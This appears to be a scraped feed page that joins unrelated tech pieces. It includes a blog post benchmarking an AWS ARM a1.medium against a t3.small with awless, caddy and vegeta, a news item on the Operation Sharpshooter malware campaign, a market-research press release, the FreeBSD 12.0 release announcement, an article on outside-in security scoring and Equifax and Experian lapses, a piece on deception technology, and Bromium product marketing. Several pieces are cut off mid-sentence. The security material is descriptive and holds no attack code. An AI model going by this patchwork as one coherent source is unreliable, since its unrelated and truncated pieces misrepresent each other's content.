Because ARM uses a “reduced instruction set” vs the x86 “complex instruction set”, it’s difficult to compare performance directly, because what’s done in a single instruction can vary. I’d been looking for a quick way to generate a lot of HTTP load inside a private VPC subnet. That seemed like a good workload to compare where the actual question of “how much work can you get done, how quickly” ends up being measurable. How many requests/second can be generated before the host gets unstable?

I chose caddy for the web server, because it’s a single simple binary and performs well, and vegeta for load generation for the same reasons. (Also, I have a history of vegetalove .)

Launch a server with awless

Ok, we’re tinkering, let’s get started. How do you create an instance? Luckily the self-documentation game is strong.

$ awless create instance -h

You can provide any params you want on the command line, and fill in other required ones interactively (with tab completion!) I was stuck needing to pick a good subnet and security group, though. This is easy:


Expermenting with AWS's new a1 instances with awless

From right in the terminal I can see which subnets are public and which aren’t. Running awless show <identifier> , like awless show subnet-46fc311e gives more information about things if needed. But I’m tinkering, and this is a scratch account, I just need a public submet, and I’ve only got my default security group.

You may note the redacted box; that is my home IP, which is allowed to SSH into that security group. That’s a leftover from a previous tinkering session with awless ; when I tried to ssh in, it couldn’t connect, and very helpfully suggested I may want to punch in a hole for myself with the following command. Notably, it figured out what my public facing IP was, and what the proper security group for the host I was connecting to was. It’s hard to imagine being more tinkering friendly than that.

$ awless update securitygroup id=sg-9082dee9 inbound=authorize protocol=tcp cidr=XX.YY.ZZ.QQ/32 portrange=22

I also needed to create a keypair for this account. That’s easy too:

$ awless create keypair name=mykey

The only place I had to go to the console was to find the proper AMI for an ARM host, but since that feature just launched, it’s probably ok that it’s not built in yet!

Now I can launch a host:

$ awless create instance type=a1.medium image=ami-0f8c82faeb08f15da subnet=subnet-46fc311e securitygroup=sg-9082dee9 keypair=mykey name=sledgehammer

Once it comes up, there’s a handy ssh capability, as well. As noted above, it’s smart enough to even recommend security groups, but it can also use jump boxes, guess the right username to use, and more.

$ awless ssh sledgehammer -i mykey Get ready to load test

Sweet! So, for an ARM binary, I needed to request a custom build from caddy’s site, which ended up downloading locally, not on my fancy new host. Ok, now I need to scp… which means I need my IP address, and PEM file, things which awless had been handling for me. The IP address is easy to get with awless list instances , and it turns out, PEM files are stored by default in ~/.awless/keys/ .

$ scp -i ~/.awless/keys/joshkey.pem caddy ec2-user@54.167.228.17:

The other tools I need are a quick install or download/unpack away:

$ awless ssh sledgehammer -i mykey $ sudo yum -y install tmux htop $ wget https://github.com/tsenart/vegeta/releases/download/cli%2Fv12.1.0/vegeta-12.1.0-linux-arm64.tar.gz $ tar -zxvf vegeta-12.1.0-linux-arm64.tar.gz

And, I wanted to let the machine work as hard as possible, with no chance of file descriptors becoming a bottleneck, so I added a few lines to /etc/security/limits.conf .

ec2-user soft nofile 900000 ec2-user hard nofile 1000000

I’m using tmux here to keep any load tests running even if my ssh connection drops, and also to provide “virtual terminals.”

One window to run caddy as a webserver One window to run vegeta as a load generator One window to run htop , as it’s a very handy core-aware interface for quickly seeing if the host is really pegged, and if so, what’s doing it. tmux in 10 seconds There is a special hotkey which you use to tell tmux you’re giving it a command. By default, it’s Control-b . To start using tmux, run tmux . To connect to a session already in progress, you attach to it. ( tmux a ). Once inside a tmux, you can create a new “window” with the hotkey, then c . (Default, Control-b , then c ) You can navigate between windows a few ways, but I usually use Control-b , p (revious) and Control-b , n (ext) Run the load test

I create 3 tmux windows, for htop , ./caddy , and vegeta Vegeta’s command line is also very composable and great for tweaking and playing with. I send in the URL (which caddy will serve), define the features of the ‘attack’, then dump out a report of the data.

$ echo "GET http://localhost:2015/README.md" | ./vegeta attack -duration=30s -workers=10 -rate=50 | tee results.bin | ./vegeta report

The README.md shipped with the vegeta tarball, so seemed like a reasonable file to use for the test. Use what you have.

I played around with the -workers and -rate setting by hand this time, though I haveautomated it before.

Finally, after some manual binary searching, the setting which ‘broke’ it was: -workers=10 -rate=2500 .

Requests [total, rate] 13168, 1270.38 Duration [total, attack, wait] 17.211569325s, 10.36538365s, 6.846185675s Latencies [mean, 50, 95, 99, max] 3.050666636s, 3.186014712s, 6.150334217s, 6.950259063s, 9.812459568s Bytes In [total, mean] 251087424, 19068.00 Bytes Out [total, mean] 0, 0.00 Success [ratio] 100.00% Status Codes [code:count] 200:13168 Error Set:

I asked for 2500 requests per second, and yet it was only able to generate 1270. You can also see that the latencies for the requests, usually in the 20-100ms range in earlier tests, are seconds. This machine is giving all it has to give.

So, I’m calling that the number for now: 1270 rps . Let’s see how the other team does.

Time to kill the server and stop paying … tiny fractions of a penny per minute for it! awless has our backs, of course.

$ awless delete instance ids=@sledgehammer delete instance i-071ca8ea62f607dfe Confirm (region: us-east-1)? [y/N] y [info] OK delete instance Comparison test with t3 instances

Looking at ec2instances.info the most comparable machine to the a1.medium is probably a t3.small .

a1.medium t3

So, I know I need to do some of the same things again when I spin the new host up … and maybe I’ll want to test on some low end c’s and m’s as well. It’s not hard to make a small script that gets run at machine creation via userdata.

Pop this into setup.sh :

#!/bin/bash yum -y install tmux htop cd ~ec2-user wget https://github.com/tsenart/vegeta/releases/download/cli%2Fv12.1.0/vegeta-12.1.0-linux-amd64.tar.gz tar -zxvf vegeta-12.1.0-linux-amd64.tar.gz wget https://caddyserver.com/download/linux/amd64?license=personal\&telemetry=on -O caddy.tar.gz tar -zxvf caddy.tar.gz cat >>/etc/security/limits.conf <<EOF ec2-user soft nofile 900000 ec2-user hard nofile 1000000 EOF

I feel compelled to say that yes, downloading tarballs without checking their checksums, untarring them into a home directory, and running them from a shell these are all bad things that one should never consider for production. But also, it’s wonderfully liberating to know that this machine will have a new home in /dev/null in literally minutes … if it gets me where I need to go faster, anything goes.

Bringing up a t3.small is now trivial:

$ awless create instance type=t3.small subnet=subnet-46fc311e securitygroup=sg-9082dee9 keypair=mykey name=t3small userdata=setup.sh

Within about 45 seconds I’m able to ssh in and begin the testing, no other tweaking required.

So, doing the exact same tests, what are the results?

[ec2-user@ip-172-31-19-157 ~]$ echo "GET http://localhost:2015/README.md" | ./vegeta attack -duration=30s -workers=20 -rate=5000 | tee resu lts.bin | ./vegeta report Requests [total, rate] 150000, 4988.30 Duration [total, attack, wait] 30.076498082s, 30.070365154s, 6.132928ms Latencies [mean, 50, 95, 99, max] 27.77611ms, 22.313409ms, 69.037507ms, 109.292859ms, 230.308868ms Bytes In [total, mean] 2860200000, 19068.00 Bytes Out [total, mean] 0, 0.00 Success [ratio] 100.00% Status Codes [code:count] 200:150000 Error Set:

The t3.small hits the CPU redline, and starts to deliver fewer requests/sec than asked for, only at 5000 rps and it still manages to deliver 4988 rps , or 3.9x more than the a1.medium

This means that even if it’s only running at 40% capacity after the burst window, it would still likely push out 1995 rps still 1.5x more than the a1 .

Interestingly, I tried the same test on a t3.micro (which just required a re-run of the previous command with different variables), and got almost identical results though the credit cliff might be steeper.

Conclusions

I really can’t ‘conclude’ much, this test was tinkering-grade; not science or anything close to it. But I do suspect that right now in AWS, you can generate more brute force load testing requests/second/dollar on Intel than you can ARM. This being a heavily CPU-bound task, that’s in line with what even AWS says about them. It’s still an impressive first outing and I’ll be excited to see what other people do with them. There may be workloads with a different CPU / waiting for i/o ratio where they’d comparatively shine. They also do come with higher performance network than the t3 s, which would be interesting to test. Perhaps when load testing across the network, the performance gap would shrink?

Hopefully you’ll share my conclusion that awless is a useful tool to have in the toolbox, especially for quickly creating and disposing of machines and other basic infrastructure. It fits very nicely in between “not worth terraforming yet” and “too annoying to use the console for.”

Operation Sharpshooter Takes Aim at Global Critical Assets

$
0
0

Operation Sharpshooter uses a new implant to target mainly English-speaking nuclear, defense, energy and financial companies.

Researchers have detected a widespread reconnaissance campaign using a never-before-seen implant framework to infiltrate global defense and critical infrastructure players ― including nuclear, defense, energy and financial companies.

The campaign, dubbed Operation Sharpshooter, began Oct. 25 when a splay of malicious documents were sent via Dropbox. The campaign’s implant has since appeared in 87 organizations worldwide, predominantly in the U.S. and in other English-speaking companies.


Operation Sharpshooter Takes Aim at Global Critical Assets

Click to Expand

“Our discovery of a new, high-function implant is another example of how targeted attacks attempt to gain intelligence,” said Ryan Sherstobitoff and Asheer Malhotrawith of McAfee, in a Wednesday analysis .

They added that the malware takes several steps to unfold. The initial attack vector is a document that contains a weaponized macro. Once downloaded, it places embedded shellcode into the memory of Microsoft Word, which acts as a simple downloader for a second-stage implant. This next stage runs in memory and gathers intelligence.

“The victim’s data is sent to a control server for monitoring by the actors, who then determine the next steps,” the researchers said. They added that this could be a recon effort for a larger campaign down the road.

The documents, which contained English-language job descriptions for positions “at unknown companies,” were loaded with Korean-language metadata indicating that they were created with a Korean version of Microsoft Word.

Rising Sun

That second-stage implant is a fully modular backdoor dubbed Rising Sun that performs reconnaissance on the victim’s network, according to the research.


Operation Sharpshooter Takes Aim at Global Critical Assets

Click to Expand

Notably, Rising Sun uses source code from the Duuzer backdoor , malware first used in a 2015 campaign targeting the data of South Korean organizations, mainly in manufacturing. Duuzer, which is designed to work with 32-bit and 64-bit windows versions, opens a back door through which bad actors can gather system information.

In this situation, the Rising Sun implant gathers and encrypts data from the victim, and fetches the victim devices’ computer name, IP address data, native system information and more.

While the second-stage implant is downloading, the control server also downloads another OLE document which researchers say is “probably benign, used as a decoy to hide the malicious content.”

Lazarus False Attribution

Researchers noted several characteristics of the campaign that linked it to theLazarus Group, but suspected that the clues were purposefully planted as false flags to connect the two.

For instance, Rising Sun is similar to the Lazarus Group’s Duuzer implant however, the two have key differences, including their communication methods, the command codes used and their encryption schemes.

“Operation Sharpshooter’s numerous technical links to the Lazarus Group seem too obvious to immediately draw the conclusion that they are responsible for the attacks, and instead indicate a potential for false flags,” researchers said. “Our research focuses on how this actor operates, the global impact, and how to detect the attack. We shall leave attribution to the broader security community.”

Global Software-defined Perimeter Market 2019-2023 | 34% CAGR Projection Over th ...

$
0
0

LONDON (BUSINESS WIRE) lt;a href=”https://twitter.com/hashtag/ITSecurity?src=hash” target=”_blank”gt;#ITSecuritylt;/agt; The global software-defined perimeter market is expected to post a CAGR

of over 34% during the period 2019-2023, according to the latest market

research report by Technavio .


Global Software-defined Perimeter Market 2019-2023 | 34% CAGR Projection Over th ...
Global Software-defined Perimeter Market 2019-2023 | 34% CAGR Projection Over th ...

A key factor driving the growth of the market is the increase in network

attacks across the globe. The network attacks by hackers and

cybercriminals are growing at an alarming rate. The number of network

attacks such as DDoS, man-in-the-middle, and APTs by hackers is rising

globally. For instance, almost one-third of the enterprises faced DDoS

in 2017. Another example of network attacks is, in January 2018, ABN

AMRO, a Dutch bank, faced a DDoS attack. As a result of this attack,

services such as internet banking and mobile banking were not available

or extremely slow for more than 4 hours. Therefore, SDP supports

enterprises in permitting good connections or packets and in dropping

bad packets or connections. In the case of a network attack, SDP blocks

malicious traffic as well as automates the process of blocking and

stopping the traffic immediately from reaching the services and

applications. Thus, the increase in network attacks across the globe is

expected to trigger the growth of the global SDP market during the

forecast period.

This market research report on the

global

also provides an

analysis of the most important trends expected to impact the market

outlook during the forecast period. Technavio classifies an emerging

trend as a major factor that has the potential to significantly impact

the market and contribute to its growth or decline.

This report is available at a USD 1,000 discount for a limited time

only:

View

market snapshot before purchasing

In this report, Technavio highlights the emergence of BYOD as one of the

key emerging trends in the global software-defined perimeter market:

Global software-defined perimeter market:
Emergence of BYOD

Organizations are increasingly adopting smartphones and tablets to

enable employees to work remotely. A large number of employees now stay

connected with the corporate network with constant support from

enterprise IT departments. The adoption of the BYOD concept by firms has

allowed employees to access organizational data and resources without

being tied to a single location. Mobile devices are now becoming primary

devices among employees in an organization. SMEs are increasingly

shifting to BYOD for professional tasks, and this move has helped them

in improving their productivity and efficiency significantly. However,

enterprises face a challenge in controlling the BYOD devices. SDP

provides enterprises with policies that help them in limiting access to

specific resources and information. It also provides a low cost of

ownership and flexibility through its user-friendly and secure

environment. This is encouraging enterprises to adopt SDP to make the

BYOD networking systems more robust and secure.

“Apart from emergence of BYOD, the rise in the number of strategic

alliances, the use of SDP with blockchain for improving automotive

cybersecurity, and the growing use of IoT are some other factors

says a

senior analyst at Technavio for research on IT security.

Global software-defined perimeter market:
Segmentation analysis

This market research report segments the global software-defined

perimeter market by geographical regions, including APAC, EMEA, and the

Americas.

The Americas led the market in 2018 with a market share close to 43%,

followed by APAC and EMEA respectively. However, during the forecast

period, the APAC region is expected to register the highest incremental

growth, followed by the EMEA region.

Looking for more information on this market?

Request

a free sample report

Technavio’s sample reports are free of charge and contain multiple
sections of the report such as the market size and forecast, drivers,
challenges, trends, and more.

Some of the key topics covered in the report include:

Market Landscape

Market ecosystem Market characteristics Market segmentation analysis

Market Sizing

Market definition Market size and forecast

Five Forces Analysis

Market Segmentation

Geographical Segmentation

Regional comparison Key leading countries

Market Drivers

Market Challenges

Market Trends

Vendor Landscape

Vendors covered Vendor classification Market positioning of vendors Competitive scenario

About Technavio

Technavio

is a leading global technology research and advisory company. Their

research and analysis focuses on emerging market trends and provides

actionable insights to help businesses identify market opportunities and

develop effective strategies to optimize their market positions.

With over 500 specialized analysts, Technavio’s report library consists

of more than 10,000 reports and counting, covering 800 technologies,

spanning across 50 countries. Their client base consists of enterprises

of all sizes, including more than 100 Fortune 500 companies. This

growing client base relies on Technavio’s comprehensive coverage,

extensive research, and actionable market insights to identify

opportunities in existing and potential markets and assess their

competitive positions within changing market scenarios.

If you are interested in more information, please contact our media team

at media@technavio.com .

Contacts

Technavio Research

Jesse Maida

Media & Marketing Executive

US:

+1 844 364 1100

UK: +44 203 893 3200

www.technavio.com
Global Software-defined Perimeter Market 2019-2023 | 34% CAGR Projection Over th ...
Do you think you can beat this Sweet post? If so, you may have what it takes to become a Sweetcode contributor...Learn More.

FreeBSD 12.0-RELEASE Announcement

$
0
0

The FreeBSD Release Engineering Team is pleased to announce the availability of FreeBSD12.0-RELEASE. This is the first release of the stable/12 branch.

Some of the highlights:

OpenSSL has been updated to version 1.1.1a (LTS).

Unbound has been updated to version 1.8.1, and DANE-TA has been enabled by default.

OpenSSH has been updated to version 7.8p1.

Additonal capsicum(4) support has been added to sshd(8).

Clang, LLVM, LLD, LLDB, compiler-rt and libc++ has been updated to version 6.0.1.

The vt(4) Terminus BSD Console font has been updated to version 4.46.

The bsdinstall(8) utility now supports UEFI+GELI as an installation option.

The VIMAGE kernel configuration option has been enabled by default.

The NUMA option has been enabled by default in the amd64 GENERIC and MINIMAL kernel configurations.

The netdump(4) driver has been added, providing a facility through which kernel crash dumps can be transmitted to a remote host after a system panic.

The vt(4) driver has been updated with performance improvements, drawing text at rates ranging from 2- to 6-times faster.

Various improvements to graphics support for current generation hardware.

Support for capsicum(4) has been enabled on armv6 and armv7 by default.

The UFS/FFS filesystem has been updated to consolidate TRIM/BIO_DELETE commands, reducing read/write requests due to fewer TRIM messages being sent simultaneously.

The NFS version 4.1 server has been updated to include pNFS server support.

The pf(4) packet filter is now usable within a jail(8) using vnet(9).

The bhyve(8) utility has been updated to add NVMe device emulation.

The bhyve(8) utility is now able to be run within a jail(8).

Various Lua loader(8) improvements.

KDE has been updated to version 5.12.5.

And more...

For a complete list of new features and known problems, please see the online release notes and errata list, available at:

https://www.FreeBSD.org/releases/12.0R/relnotes.html

https://www.FreeBSD.org/releases/12.0R/errata.html

For more information about FreeBSD release engineering activities, please see:

https://www.FreeBSD.org/releng/

Availability

FreeBSD12.0-RELEASE is now available for the amd64, i386, powerpc, powerpc64, powerpcspe, sparc64, armv6, armv7, and aarch64 architectures.

FreeBSD12.0-RELEASE can be installed from bootable ISO images or over the network. Some architectures also support installing from a USB memory stick. The required files can be downloaded as described in the section below.

SHA512 and SHA256 hashes for the release ISO, memory stick, and SD card images are included at the bottom of this message.

PGP-signed checksums for the release images are also available at:

https://www.FreeBSD.org/releases/12.0R/signatures.html

A PGP-signed version of this announcement is available at:

https://www.FreeBSD.org/releases/12.0R/announce.asc

The purpose of the images provided as part of the release are as follows:

dvd1

This contains everything necessary to install the base FreeBSD operating system, the documentation, debugging distribution sets, and a small set of pre-built packages aimed at getting a graphical workstation up and running. It also supports booting into a "livefs" based rescue mode. This should be all you need if you can burn and use DVD-sized media.

Additionally, this can be written to a USB memory stick (flash drive) for the amd64 architecture and used to do an install on machines capable of booting off USB drives. It also supports booting into a "livefs" based rescue mode.

As one example of how to use the memstick image, assuming the USB drive appears as /dev/da0 on your machine something like this should work:

# dd if=FreeBSD-12.0-RELEASE-amd64-dvd1.iso \ of=/dev/da0 bs=1m conv=sync

Be careful to make sure you get the target (of=) correct.

disc1

This contains the base FreeBSD operating system. It also supports booting into a "livefs" based rescue mode. There are no pre-built packages.

Additionally, this can be written to a USB memory stick (flash drive) for the amd64 architecture and used to do an install on machines capable of booting off USB drives. It also supports booting into a "livefs" based rescue mode. There are no pre-built packages.

As one example of how to use the memstick image, assuming the USB drive appears as /dev/da0 on your machine something like this should work:

# dd if=FreeBSD-12.0-RELEASE-amd64-disc1.iso \ of=/dev/da0 bs=1m conv=sync

Be careful to make sure you get the target (of=) correct.

bootonly

This supports booting a machine using the CDROM drive but does not contain the installation distribution sets for installing FreeBSD from the CD itself. You would need to perform a network based install (e.g., from an HTTP or FTP server) after booting from the CD.

Additionally, this can be written to a USB memory stick (flash drive) for the amd64 architecture and used to do an install on machines capable of booting off USB drives. It also supports booting into a "livefs" based rescue mode. There are no pre-built packages.

As one example of how to use the memstick image, assuming the USB drive appears as /dev/da0 on your machine something like this should work:

# dd if=FreeBSD-12.0-RELEASE-amd64-bootonly.iso \ of=/dev/da0 bs=1m conv=sync

Be careful to make sure you get the target (of=) correct.

memstick

Scanning for Flaws, Scoring for Security

$
0
0

Is it fair to judge an organization’s information security posture simply by looking at its Internet-facing assets for weaknesses commonly sought after and exploited by attackers, such as outdated software or accidentally exposed data and devices? Fair or not, a number of nascent efforts are using just such an approach to derive security scores for companies and entire industries. What’s remarkable is how many organizations don’t make an effort to view their public online assets as the rest of the world sees them ― until it’s too late.


Scanning for Flaws, Scoring for Security

Image: US Chamber of Commerce.

For years, potential creditors have judged the relative risk of extending credit to consumers based in part on the applicant’s credit score ― the most widely used being the score developed by FICO , previously known as Fair Isaac Corporation . Earlier this year, FICO began touting its Cyber Risk Score (PDF), which seeks to measure an organization’s chances of experiencing a data breach in the next 12 months, based on a variety of measurements tied to the company’s public-facing online assets.

In October, FICO teamed up with the U.S. Chamber of Commerce to evaluate more than 2,500 U.S. companies with the Cyber Risk Score, and then invited these companies to sign up and see how their score compares with that of other organizations in their industry. The stated use cases for the Cyber Risk Score include the potential for cyber insurance pricing and underwriting, and evaluating supply chain risk (i.e., the security posture of vendor partners).

The company-specific scores are supposed to be made available only to vetted people at the organization who go through FICO’s signup process. But in a marketing email sent to FICO members on Tuesday advertising its new benchmarking feature, FICO accidentally exposed the FICO Cyber Risk Score of energy giant ExxonMobil .

The marketing email was quickly recalled and reissued in a redacted version, but it seems ExxonMobil’s score of 587 puts it in the “elevated” risk category and somewhat below the mean score among large companies in the Energy and Utilities sector, which was 637. The October analysis by the Chamber and FICO gives U.S. businesses an overall score of 687 on a scale of 300-850.


Scanning for Flaws, Scoring for Security

Data accidentally released by FICO about the Cyber Risk Score for ExxonMobil.

How useful is such a score? Mike Lloyd , chief technology officer at RedSeal , was quoted as saying a score “taken from the outside looking in is similar to rating the fire risk to a building based on a photograph from across the street.”

“You can, of course, establish some important things about the quality of a building from a photograph, but it’s no substitute for really being able to inspect it from the inside,” Lloyd told Dark Reading regarding the Chamber/FICO announcement in October.

Naturally, combining external scans with internal vulnerability probes and penetration testing engagements can provide organizations with a much more holistic picture of their security posture. But when a major company makes public, repeated and prolonged external security foibles, it’s difficult to escape the conclusion that perhaps it isn’t looking too closely at its internal security either.

ENTIRELY, CERTIFIABLY PREVENTABLE

Too bad the errant FICO marketing email didn’t expose the current cyber risk score of big-three consumer credit bureau Equifax , which was relieved of personal and financial data on 148 million Americans last year after the company failed to patch one of its Web servers and then failed to detect an intrusion into its systems for months.

A 96-page report (PDF)released this week by a House oversight committee found the Equifax breach was “entirely preventable.” For 76 days beginning mid May 2017, the intruders made more than 9,000 queries on 48 Equifax databases.

According to the report, the attackers were able to move the data off of Equifax’s network undetected thanks to an expired security certificate. Specifically, “while Equifax had installed a tool to inspect network traffic for evidence of malicious activity, the expired certificate prevented that tool from performing its intended function of detecting malicious traffic.”

Expired certificates aren’t particularly rare or noteworthy, but when they persist in publicly-facing Web servers for days or weeks on end, it raises the question: Is anyone at the affected organization paying attention at all to security?

Given how damaging it was for Equifax to have an expired certificate, you might think the company would have done everything in its power to ensure this wouldn’t happen again. But it would happen again ― on at least two occasions earlier this year.

In April 2018, KrebsOnSecurity pointed out that the Web site Equifax makes available for consumers who wish to freeze their credit files was using an expired certificate, causing the site to throw up a dire red warning page that almost certainly scared countless consumers away from securing their credit files.

It took Equifax two weeks to fix that expired cert. A week later, I found another expired certificate onthe credit freeze Web portal for the National Consumer Telecommunications and Utilities Exchange ― a consumer credit bureau operated by Experian.

ARE YOU EXPERIANSED?

One has to wonder what the median FICO Cyber Risk Score is for the credit bureau industry, because whatever Equifax’s score is it can’t be too different from that of its top competitor ― Experian , which is no stranger to data breaches .

On Tuesday, security researcher @notdan tweeted about finding a series of open directories on Experian’s Web site. Open directories, in which files and folders on a Web server are listed publicly and clickable down to the last file, aren’t terribly uncommon to find exposed on smaller Web sites, but they’re not the sort of oversight you’d expect to see at a company with the size and sensitivity of Experian.


Scanning for Flaws, Scoring for Security

A directory listing that exposed a number of files on an Experian server.

Included in one of the exposed directories on the Experian server were dozens of files that appeared to be digital artifacts left behind by a popular Web vulnerability scanner known as Burp Suite . It’s unclear whether those files were the result of scans run by someone within the company, or if they were the product of an unauthorized security probe by would-be intruders that somehow got indexed by Experian’s

Deception: Honey vs. Real Environments

$
0
0

A primer on choosing deception technology that will provide maximum efficacy without over-committing money, time and resources.

Deception technology is offering defenders the ability to finally gain a rare advantage over adversaries by doing something that other forms of defense can't: provide early and accurate detection by planting a minefield of attractive decoys to trip up attackers. We've seen examples of this type of defense used by the FBI and other top law enforcement to catch criminals such as child pornographers and, more recently, egregious financial theft.

Decoys are designed to catch early-stage activity as the adversary looks to understand the network and how to find its target. I call this early stage of an attack "casing the joint," and my research has shown that interrupting this stage― ultimately, reducing the dwell time of a potential attack― is crucial to protecting data. Defenders can watch what is happening, learn more about the nature of the attack, and better understand the way that the attacker is moving through a network or even a cloud-based file share.

More organizations are starting to look at deception as a way to plug the gaps of existing deployed security solutions such as data loss prevention, encryption, access management, and user behavior analytics. But how can security teams determine which form of deception is the right one for their organizations? It's up to each organization to determine which deception approach makes the most sense for them.

Defining "Honey" Environments

Currently, most offerings in the deception market are focused on the buildout of complex honey environments, designed to lure attackers into fake systems to distract and track their behaviors.

A honeypot is a network-adjacent system set up to lure adversaries and to detect, deflect, or study hacking attempts. There are various types of honeypots, classified by the level of interaction they conduct with an intruder. When designed properly, honeypots are meant to prevent adversaries from accessing protected areas of an organization's operational network. A properly configured honeypot should have many of the same components of an organization's production system, especially data. Their most significant value is the information they can obtain on the behavior of the adversary and what the intent of the attacker is. Data that enters and leaves a honeypot allows security staff to gather information, such as the attacker's keystrokes or their attempted lateral moves throughout the fake honeypot system.

A honeynet is a network of multiple honeypots designed to simulate a real network. Essentially, they are large-scale network decoys that mimic a collection of typical servers that might be found on a business network. According to the SANS 2017 report, " The State of Honeypots: Understanding the Use of Honey Technologies Today ," "Honeynets connect and interact in the same way a real network would― none of the connections between systems are emulated." On a scale of 1 to10, with 10 being the most effective, users of honeypots surveyed in this SANS report rated honeynets at 7.5 in terms of overall effectiveness. Like honeypots, the biggest value of a honeynet deployment is the intelligence security teams can gather on attacker behavior.

When properly built and maintained, honey environments can provide valuable information about how the attacker moves around in a network in search of data to exfiltrate. But only if the attacker enters the honeynet.

Honey Hardships

There are some significant challenges and shortcomings that make honey environments difficult to deploy, manage, and maintain. Before investing, you need to conduct a serious costs-benefit analysis.

First, while honey environments are built and maintained outside of the enterprise's operational environment, honeynets still require hackers to gain initial entry through the operational environment. Organizations must then hope that the breadcrumbs leading to the honey environment are convincing enough to actually lure the hacker. Also, once a hacker leaves the fake environment, there is no way of knowing if he or she re-enters the operational environment to continue an attack or what data they may have exfiltrated prior to tripping over a breadcrumb.

Second, the cost and resources required to create these environments can put a strain on security teams that are already overwhelmed by the number of security alerts and investigations they do on a daily basis. Organizations must establish an environment that mimics the operational environment in order to have any chance that attackers will believe it is real. Then, that environment must be maintained to keep it realistic. This level of investment and upkeep to make a honeynet work is no small commitment.

Third, there are limits to the usefulness of the data that honey environments can provide on adversaries. It's true that they are a good method for learning more about how attackers move throughout a system in search of data to steal, but they reveal little about the actual hacker and what happens to data once it has been stolen.

Finally, adversaries have become increasingly sophisticated in identifying "tells" in honey environments. Hackers who present any serious threat will often target specific IP addresses that they know are valid machines. If a hacker wants to identify any honeypots sitting on a corporate network (a process known as "fingerprinting"), it is easy to do because the machine will either have no outbound traffic, or the deceptive traffic will be contrived and not follow a normal usage pattern. For a honeynet to have any value, an intruder shouldn't be able to detect that he or she is on a fake system. The goal is to give the adversary a false sense of reality and a false sense of security that his or her actions are not being noticed or monitored.

Deception in the Real World

Deploying deception technology within operational and cloud environments allows security teams to detect and deceive attackers in the direct path to sensitive data instead of hoping they are lured away. Deployment of believable decoy documents inside operational networks provides all of the same benefits of honeypots and honeynets but negates the need to create and maintain fake environments.

Deception that does not depend on honey environments can also be used to proactively fight back against hackers and leakers. Attackers rely on various tools for anonymity, and these tools often contribute to the success of bold attacks. Deception techniques not limited by fake environments can be used to pierce these tools and reveal attackers, often without their knowledge. This provides a unique advantage for organizations and law enforcement to hold hackers and leakers accountable.

Trustworthy Network Segmentation for an Untrustworthy World

$
0
0
Denial is not a strategy. The reality is that networks,PCsand XenApp clientsare susceptible to attacks, if they haven’t been breached already. Network segmentation is an imperative. Organizations need to isolate applications that contain sensitive data, but this approach canintroducethe cost and hassle of issuing a second PC for authorized users. Establish trueend-to-end protections around sensitive assets in applications―no second PC required―with Bromium Protected App. TheChallenge: The Flaws in Existing Defenses and the Network Segmentation Mandate

Security teams continue to introduce new protection mechanisms andadditionallayers of defense. Today, a typical organizationis runningavirtualalphabet soup of perimeter defenses―thinkAV, IDS, IPS andmany other systems. While these respective tools remain important, they’re not foolproof. Especially when tested againstsophisticated cyber threats, these defenses continue to prove vulnerable.

If you’re responsible for security, you must assume that endpoints and networks are compromised,or soon will be,and can’t be trusted. That meanssensitive data, including intellectual property, personally identifiable information, and moreare vulnerable, leavingthebusiness exposed to fines for non-compliance, competitive threats,brand damage, and more.

How do you build trust in an untrustworthy world?These realities are compelling security teams to establish zero-trust architectures via network segmentation.The concept of “zerotrust” has its advocates and its detractors, but the bottom line is this:Organizations need to create separation between sensitive assets and vulnerable networks and PCs.

That’s why security best practices and compliance mandates like the PCI DSS recommend putting sensitive information, such as payment carddata, in a segmented network.By establishing asecurelysegmented network, organizations cancreatean isolated domain for sensitive data.As part ofthiseffort,security teams need to establish a way for authorized users to access sensitive data. Historically, these teams havehad two options:Issuing a dedicated, second PC to authorized users, or employing remote desktopprotocol (RDP)or virtual desktop infrastructure (VDI) clients like XenApp. However, each of these approaches presents significant downsides.

Second PC

Whensecurity teamsissue a second PC,they need toestablishtwo fundamentalcontrols. First,they need to ensureonly these dedicated PCs can access applications in the segmented network. Second,they need to makesurethese PCs can only access the segmented application and network, and no others.

With these controls in place, organizations can establishclear isolation. However,this issuance of a second PCimposes significant penalties:

It adds significant effort and complexity for users. It creates extra procurement, set up, and maintenance work for technical teams. It also adds cost for the business. Remote Desktop/XenApp Clients

Another option is to have authorized users accessthe segmented networkviaRDPor XenApp clients.Thisapproach can bedifficult toimplement, and itintroduces significant security vulnerabilities. Fundamentally, if the host on a user device is compromised, the segmented network willstillbe vulnerable.RDPisa protocol that iscommonlytargetedby cyber criminals. While network-level authentication is required in most RDPand XenAppimplementations, this security mechanism won’t guard against a hackerusingkeyloggers, scraping screen contents or extracting passwords from application memory.

How canyoursecurityteams safeguardsensitive applications and data, without incurring the cost, effort,and complexity associated with introducing a second PCorleaving the business exposed to compromised RDP or XenApp clients?

TheSolution:BromiumProtected App

With BromiumProtected App , you canestablishend-to-end protections around sensitive assets in applications, without issuing second PCs to authorized users.The solution enables customers to completely isolate sensitive applications and secure network connections between clients and servers.ProtectedAppensures sensitive data remains secure, even when networks and PCs get compromised.

Protected App: How it Works

BromiumProtected App offers capabilities for hardware-enforced isolation of remote desktops andXenAppclients. The solution is employed on the user’s windows PC, beneath the operating system (OS) layer, establishing a protected virtual machine (VM) that is completely isolated from the OS.Even if a user’s endpoint is compromised, it won’t pose any risk to the partitioned, protected application. The user can only access the application through the protected VM, which remains isolated from the Windows OS and any malware that may infect it.Further,Protected AppcanisolateRDPandXenApp clientsfrom the host PC,so connectionsto the segmented network can’t beexploited.

Comprehensive Safeguards

BromiumProtected App deliverscomprehensivesafeguards against malware, compromised host OSs, and even malicious administrators.The solution protects organizations against these threats:

Keylogging . Keystrokes that users enter whileworking withBromiumProtected App are invisible to the host. Even if a malicious actor or malware has compromised the host, the host can’t be used to inject keystrokes into the protected VM. Memory tampering . Because its memory is isolated from the Windows OS, the VM’s memory is tamper proof. Disk tampering . The VM is isolated and,becausethe disk is encrypted,itcan’t be tampered with. Kernel exploits . Because the VM is independent of the Windows OS, it isn’t susceptible to a Windows kernel exploit. Unauthorized user commands .Block a number of unauthorized commands, including screen captures, downloads, copy and paste, and printing. Man-in-the-middle attacks . The solution encrypts all network traffic between theBromiumProtected App client and the secure server.This means datacan’t be viewed in the clear by the user’s host OS or when in transit across the network. Benefitsof Protected App

By implementing BromiumProtected App , your organization can realize a number of benefits:

Address critical security threats―with unrivaled efficiency and ease . Thesolution makes it practicalto secure the applications that host sensitive data, without having to ensure endpoint devices are free of malwareor issue a second PC. Establish broad protection against range of threats .BromiumProtected App enables customers to establish strong safeguards around sensitive applications and data, helping ensure confidentiality and integrity. T

